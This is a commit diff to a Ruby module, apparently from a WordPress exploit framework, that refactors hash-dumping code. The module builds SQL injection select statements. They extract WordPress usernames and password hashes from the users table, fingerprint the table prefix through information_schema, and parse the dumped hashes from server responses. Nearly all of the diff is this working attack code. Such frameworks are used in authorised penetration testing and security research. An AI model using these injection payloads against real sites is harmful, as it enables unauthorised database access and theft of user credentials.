Expose some more methods

Author: rastating

lib/wpxf/wordpress/hash_dump.rb

@@ -27,8 +27,15 @@ def export_path
   # @return [String] a unique SQL select statement that can be used to extract the hashes.
   def hashdump_sql_statement
     cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
-    cols[hashdump_visible_field_index] = "concat(#{@bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{@eof_token})"
-    "select #{cols.join(',')} from #{@table_prefix}users"
+    cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
+    "select #{cols.join(',')} from #{table_prefix}users"
+  end
+
+  # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
+  def hashdump_prefix_fingerprint_statement
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
+    "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
   end
 
   # @return [Integer] the zero-based index of the column which is visible in the response output.
@@ -61,6 +68,11 @@ def vulnerable_url
     nil
   end
 
+  # @return [String] the table prefix determined by the module.
+  def table_prefix
+    @table_prefix
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
@@ -70,7 +82,7 @@ def run
 
     emit_info 'Determining database prefix...'
     return false unless determine_prefix
-    emit_success "Found prefix: #{@table_prefix}", true
+    emit_success "Found prefix: #{table_prefix}", true
 
     emit_info 'Dumping user hashes...'
     hashes = dump_and_parse_hashes
@@ -82,10 +94,12 @@ def run
 
   private
 
-  def hashdump_prefix_fingerprint_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
-    cols[hashdump_visible_field_index] = "concat(#{@bof_token},0x3a,table_name,0x3a,#{@eof_token})"
-    "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
+  def bof_token
+    @bof_token
+  end
+
+  def eof_token
+    @eof_token
   end
 
   def dump_and_parse_hashes
@@ -139,7 +153,7 @@ def determine_prefix
     )
 
     return nil unless res&.code == 200
-    @table_prefix = res.body[/#{@bof_token}\:([^,]+?)usermeta\:#{@eof_token}/, 1]
+    @table_prefix = res.body[/#{bof_token}\:([^,]+?)usermeta\:#{eof_token}/, 1]
   end
 
   def output_hashdump_table(hashes)
@@ -163,7 +177,7 @@ def export_hashes(hashes)
   end
 
   def parse_hashdump_body(body)
-    pattern = /#{@bof_token}\:(.+?)\:(.+?)\:#{@eof_token}/
+    pattern = /#{bof_token}\:(.+?)\:(.+?)\:#{eof_token}/
     body.scan(pattern)
   end